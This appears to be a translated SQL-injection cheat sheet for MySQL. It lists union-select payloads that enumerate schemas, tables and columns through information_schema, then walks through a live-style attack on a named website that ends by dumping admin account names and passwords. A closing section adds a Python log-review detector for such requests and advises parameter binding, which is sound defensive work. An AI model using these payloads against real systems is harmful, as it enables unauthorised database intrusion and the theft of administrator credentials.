Enumerate databases

id=-1 union select 1,..,SCHEMA_NAME,n from/**/information_schema.SCHEMATA limit 1,1/*

Enumerate tables

id=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=[hex value of the database name]/**/limit/**/1,1

Enumerate columns

id=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=[hex value of the table name]/**/limit/**/1,1

MySQL 5 advanced injection method: dumping tables
An example follows:

1. Dump table names
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/* (0x79645F7465616D6E6574 is the hex encoding of the database name yd_teamnet)
Dumping this way, the admin_user table appeared at the 4th result.

2. Dump column names
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*

3. Dump passwords
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/*
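Added example, not part of the original post: a log-review check for the request shape shown above, where /**/ stands in for whitespace and schema and table names are passed as 0x hex literals. The function names and the SAMPLES query strings are assumptions constructed from the requests quoted in this post.

```python
import re
from urllib.parse import unquote_plus

# MySQL inline comments (/**/ or /*...*/) used in place of whitespace.
INLINE_COMMENT = re.compile(r"/\*.*?\*/", re.S)
UNION_SELECT = re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)
SCHEMA_VIEW = re.compile(r"\binformation_schema\s*\.\s*(schemata|tables|columns)\b", re.I)
# Two or more hex byte pairs, so single-byte separators such as 0x7c are skipped.
HEX_LITERAL = re.compile(r"\b0x((?:[0-9a-f]{2}){2,})\b", re.I)

# Constructed sample query strings, modelled on the requests quoted above.
SAMPLES = [
    "ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*",
    "ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*",
    "ccausid=13240",
]

def normalize(query):
    """URL-decode, then collapse inline comments and whitespace to single spaces."""
    text = unquote_plus(query)
    text = INLINE_COMMENT.sub(" ", text)
    # An unterminated trailing /* comments out the rest of the statement.
    text = text.split("/*", 1)[0]
    return re.sub(r"\s+", " ", text).strip()

def decode_hex_literals(text):
    """Return printable-ASCII decodings of 0x... literals (hex-encoded names)."""
    out = []
    for m in HEX_LITERAL.finditer(text):
        raw = bytes.fromhex(m.group(1))
        if all(0x20 <= b < 0x7F for b in raw):
            out.append(raw.decode("ascii"))
    return out

def inspect(query):
    text = normalize(query)
    view = SCHEMA_VIEW.search(text)
    return {
        "union_select": bool(UNION_SELECT.search(text)),
        "schema_view": view.group(1).upper() if view else None,
        "decoded_names": decode_hex_literals(text),
    }

def is_suspicious(query):
    r = inspect(query)
    return r["union_select"] or r["schema_view"] is not None

if __name__ == "__main__":
    for s in SAMPLES:
        print(is_suspicious(s), inspect(s))
```

The decoded names tell a responder which schema and table were being enumerated; the underlying fix remains binding ccausid as an integer parameter instead of concatenating it into the query.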